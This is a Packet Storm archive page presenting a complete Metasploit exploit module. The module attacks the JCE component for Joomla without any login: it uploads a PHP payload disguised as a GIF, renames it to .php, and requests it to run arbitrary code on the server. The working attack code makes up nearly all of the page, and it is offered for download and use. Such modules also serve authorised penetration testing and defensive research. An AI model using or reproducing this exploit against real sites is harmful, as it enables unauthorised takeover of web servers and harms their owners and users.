Twenty Year Anniversary

Joomla Component JCE File Upload Remote Code Execution

Joomla Component JCE File Upload Remote Code Execution
Posted Mar 27, 2013
Authored by temp66 | Site metasploit.com

This Metasploit module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This Metasploit module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.

tags | exploit, remote, web, arbitrary, php
MD5 | 351613b5116036e2b99d0dac802e3947

Joomla Component JCE File Upload Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => 'Aug 2 2012',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
], self.class)
end


def get_version
# check imgmanager version
@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
@vars_get_base = {
'option'=> 'com_jce',
'task' => 'plugin',
'plugin'=> 'imgmanager',
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})

version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
end

return version
end

def check
version = ( get_version || '').to_s

if (version.match(%r{1\.5\.7\.1[0-4]?}))
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def upload_gif
# add GIF header
cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"

# Generate some random strings
@payload_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)

parms = {'method'=> 'form'}
parms.merge!(@vars_get_base)

# POST data
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

data = post_data.to_s

res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => parms,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
print_good("Successfully uploaded #{@payload_name}.gif")
else
print_error("Error uploading #{@payload_name}.gif")
return :abort
end

return :success

end

def renamed?
# Rename the file from .gif to .php

data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

res = send_request_cgi(
{
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
'headers' =>
{
'X-Request' => 'JSON'
}
})
if (res and res.code == 200 )
print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
return true
else
print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
return false
end
end

def call_payload
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end



def exploit

return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end

end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    7 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close